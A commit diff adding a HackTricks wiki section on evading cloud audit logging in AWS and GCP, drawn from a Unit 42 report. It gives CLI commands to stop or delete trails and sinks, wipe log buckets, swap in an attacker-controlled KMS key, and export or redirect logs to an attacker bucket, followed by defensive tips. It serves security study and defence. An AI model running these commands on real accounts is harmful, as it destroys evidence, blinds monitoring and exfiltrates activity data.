mirror of
https://github.com/HackTricks-wiki/hacktricks-cloud.git
synced 2026-06-12 11:01:38 -07:00
Add content from: Blinding the Watchmen: Abusing Cloud Logging Services for De...
This commit is contained in:
HackTricks News Bot
@@ -420,6 +420,115 @@ A tool to find a company (target) infrastructure, files, and apps on the top clo
|
||||
|
||||
- [https://github.com/RyanJarv/awesome-cloud-sec](https://github.com/RyanJarv/awesome-cloud-sec)
|
||||
|
||||
|
||||
## Cloud Logging Defense Evasion & Log Exfiltration
|
||||
|
||||
Cloud audit pipelines are also an **attack surface**. If an attacker gets permissions over the **log router** (CloudTrail trail / GCP sink), the **destination storage** (S3 / log bucket / Cloud Storage), or the **encryption key** (KMS / CMEK), they can blind detections, destroy evidence, poison forensic data, or get passive visibility into the victim account.
|
||||
|
||||
### Preconditions to check
|
||||
|
||||
High-risk permissions in this area include:
|
||||
|
||||
- **AWS:** `cloudtrail:StopLogging`, `cloudtrail:DeleteTrail`, `cloudtrail:UpdateTrail`, `cloudtrail:CreateTrail`, `s3:DeleteBucket`, `s3:DeleteObject`, `s3:GetObject`, `s3:PutObject`, and KMS permissions that let an attacker swap or break the key used by CloudTrail.
|
||||
- **GCP:** `logging.sinks.update`, `logging.sinks.delete`, `logging.sinks.create`, `logging.buckets.delete`, `storage.objects.get`, `storage.objects.create`, and KMS/CMEK permissions affecting log buckets.
|
||||
|
||||
### Common attacker playbooks
|
||||
|
||||
#### 1. Stop log delivery
|
||||
|
||||
- **AWS:** stop the trail so no new events are delivered to the configured S3 bucket.
|
||||
- **GCP:** disable the sink so matching entries are no longer routed.
|
||||
|
||||
```bash
|
||||
# AWS
|
||||
aws cloudtrail stop-logging --name <trail-name>
|
||||
|
||||
# GCP
|
||||
gcloud logging sinks update <sink-name> --disabled
|
||||
```
|
||||
|
||||
#### 2. Delete the router or the destination
|
||||
|
||||
Deleting the **router** stops future delivery. Deleting the **destination** can both stop delivery and destroy historical evidence.
|
||||
|
||||
```bash
|
||||
# AWS: delete router
|
||||
aws cloudtrail delete-trail --name <trail-name>
|
||||
|
||||
# AWS: delete historical log storage (bucket must be empty first)
|
||||
aws s3 rm s3://<cloudtrail-bucket> --recursive
|
||||
aws s3api delete-bucket --bucket <cloudtrail-bucket>
|
||||
|
||||
# GCP: delete router
|
||||
gcloud logging sinks delete <sink-name>
|
||||
|
||||
# GCP: delete log bucket
|
||||
gcloud logging buckets delete <bucket-name> --location=<location>
|
||||
```
|
||||
|
||||
#### 3. Break logging with an attacker-controlled encryption key
|
||||
|
||||
A stealthier pattern is to **repoint logging to an attacker-controlled KMS/CMEK key** that initially works, and then revoke the logging service access to that key.
|
||||
|
||||
- **AWS:** `update-trail --kms-key-id <attacker-key>` and then remove the `cloudtrail.amazonaws.com` access from the key policy or delete the key material. CloudTrail may surface a misleading **bucket access denied** style error even though the bucket is fine.
|
||||
- **GCP:** if the log bucket already supports CMEK, update it to use an attacker-controlled key and then revoke the Cloud Logging service account decrypt permissions. Reverting may fail because the current key can no longer decrypt the bucket.
|
||||
|
||||
```bash
|
||||
# AWS
|
||||
aws cloudtrail update-trail --name <trail-name> --kms-key-id <attacker-kms-key-arn>
|
||||
|
||||
# GCP
|
||||
gcloud logging buckets update <bucket-name> \
|
||||
--location=<location> \
|
||||
--cmek-kms-key-name=<full-kms-key-name>
|
||||
```
|
||||
|
||||
#### 4. Poison historical logs
|
||||
|
||||
If logs are exported as **JSON objects** into object storage, an attacker with object read/write permissions can download, modify, and overwrite historical records.
|
||||
|
||||
- **AWS:** modify CloudTrail objects in S3. Downstream consumers such as Athena may parse the poisoned events.
|
||||
- **GCP:** when sinks export to Cloud Storage, modify the stored objects there.
|
||||
|
||||
> [!TIP]
|
||||
> In AWS, enable **CloudTrail log file integrity validation** to detect post-delivery tampering. This is especially important for trails created through CLI/API workflows.
|
||||
|
||||
#### 5. Create a parallel log export for passive visibility
|
||||
|
||||
Instead of running noisy discovery commands, an attacker can configure a **new** router that continuously exports victim activity to attacker-controlled infrastructure.
|
||||
|
||||
```bash
|
||||
# AWS
|
||||
aws cloudtrail create-trail \
|
||||
--name <attacker-trail> \
|
||||
--s3-bucket-name <attacker-bucket>
|
||||
|
||||
# GCP
|
||||
gcloud logging sinks create <sink-name> <destination> --log-filter="FILTER_CONDITION"
|
||||
```
|
||||
|
||||
This provides passive discovery of API calls, IAM changes, new compute instances, and access to sensitive services.
|
||||
|
||||
#### 6. Redirect the existing pipeline
|
||||
|
||||
Modifying the current destination is usually noisier from a defender perspective than creating a second pipeline, but it can also **blind** the original monitoring stack while exfiltrating the same logs.
|
||||
|
||||
```bash
|
||||
# AWS
|
||||
aws cloudtrail update-trail --name <trail-name> --s3-bucket-name <attacker-bucket>
|
||||
|
||||
# GCP
|
||||
gcloud logging sinks update <sink-name> <new-destination>
|
||||
```
|
||||
|
||||
### High-value defensive details
|
||||
|
||||
- **AWS CloudTrail Event History** keeps an immutable **90-day** history for **management events**, but **data** and **network** events are not covered there.
|
||||
- **AWS EventBridge** rules on trail creation, modification, deletion, and `StopLogging` can catch log-plane tampering.
|
||||
- **GCP `_Required`** log bucket cannot be disabled, modified, or deleted, so it is the safest place for critical audit logs.
|
||||
- **GCP locked log buckets** prevent premature deletion because retention becomes irreversible until all retained entries age out.
|
||||
|
||||
|
||||
## Google
|
||||
|
||||
### GCP
|
||||
@@ -454,7 +563,15 @@ azure-security/
|
||||
confidential-computing/luks2-header-malleability-null-cipher-abuse.md
|
||||
{{#endref}}
|
||||
|
||||
## References
|
||||
|
||||
- [Unit 42 - Blinding the Watchmen: Abusing Cloud Logging Services for Defense Evasion and Visibility](https://unit42.paloaltonetworks.com/cloud-logging-defense-evasion/)
|
||||
- [AWS CloudTrail User Guide](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-user-guide.html)
|
||||
- [AWS CloudTrail log file integrity validation](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-log-file-validation-intro.html)
|
||||
- [AWS CloudTrail Event History](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/view-cloudtrail-events.html)
|
||||
- [Google Cloud Logging sinks](https://docs.cloud.google.com/logging/docs/export/configure_export_v2)
|
||||
- [Google Cloud Logging bucket locking](https://docs.cloud.google.com/logging/docs/buckets#locking-logs-buckets)
|
||||
- [Google Cloud Logging CMEK](https://docs.cloud.google.com/logging/docs/routing/managed-encryption)
|
||||
|
||||
{{#include ../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
||||
Reference in New Issue
Block a user